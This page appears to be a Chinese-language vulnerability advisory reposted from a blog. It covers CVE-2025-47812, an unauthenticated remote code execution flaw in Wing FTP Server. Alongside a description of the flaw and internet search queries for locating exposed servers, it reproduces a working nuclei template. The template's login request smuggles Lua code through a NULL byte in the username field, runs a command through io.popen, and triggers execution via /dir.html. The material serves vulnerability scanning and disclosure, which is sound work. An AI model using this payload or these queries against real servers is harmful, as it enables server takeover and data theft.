Wing FTP Server Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Wing FTP Server Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-47812

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Wing FTP Server是一款广泛使用的FTP服务器软件,支持多种文件传输协议,包括FTP、HTTP、FTPS、HTTPS和SFTP,常用于企业文件共享和数据传输服务。该软件因其易用性和功能丰富性,在多个行业中有广泛应用。此次发现的漏洞(CVE-2025-47812)影响版本7.4.3及之前的Wing FTP Server。漏洞的根源在于登录过程中的’username’参数处理不当,特别是对NULL字节的处理存在缺陷,导致可以注入Lua代码到会话文件中。当访问需要认证的端点如/dir.html时,这些会话文件会被执行,从而允许攻击者在服务器上执行任意命令,且具有提升的权限。值得注意的是,此漏洞仅在服务器启用匿名登录时才可被利用。由于漏洞允许未经认证的远程代码执行,且攻击复杂度低,其潜在危害极大,可能导致服务器完全被控制,敏感数据泄露,甚至被用作进一步攻击的跳板。

产品厂商: wing_ftp_server

产品名称: Wing FTP Server

影响版本: version <= 7.4.3

搜索语法: http.html_hash:2121146066, http.favicon.hash:963565804, title:”Wing FTP Server”, “Server: Wing FTP Server”, icon_hash=”963565804”, title=”Wing FTP Server”, “Server: Wing FTP Server”, app=”Wing FTP Server”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/01a59299771e9178d0aadf2065d772c10e58fac8/http%2Fcves%2F2025%2FCVE-2025-47812.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

id: CVE-2025-47812

info:
  name: Wing FTP Server <= 7.4.3 - Remote Code Execution
  author: rcesecurity,4m3rr0r
  severity: critical
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812).
    The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection
    into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting
    in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://github.com/4m3rr0r/CVE-2025-47812-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47812
    epss-score: 0.97
    epss-percentile: 0.99
  metadata:
    verified: true
    product: wftpserver
    vendor: wing_ftp_server
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
      - "Server: Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,rce,wingftp,ftp,unauth,kev

variables:
  cmd: "echo CVE-2025-47812"

http:
  - raw:
      - |
        POST /loginok.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=anonymous%00]]%0dlocal+h+%3d+io.popen("{{cmd}}")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=

  - raw:
      - |
        GET /dir.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "cve-2025-47812")'
        condition: and
# digest: 4b0a0048304602210086e6de6403641ae1d7c2b4e2fda239c45edeee6f6fb067f2fbdda234b67e79e502210090ee323cfc7e014e8ee545f64d15c176aa1d1f02c7a07dc3450b10df42f2dd17:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
Wing FTP Server Remote Code Execution Vulnerability
http://example.com/2025/07/28/github_996791619/
作者
lianccc
发布于
2025年7月28日
许可协议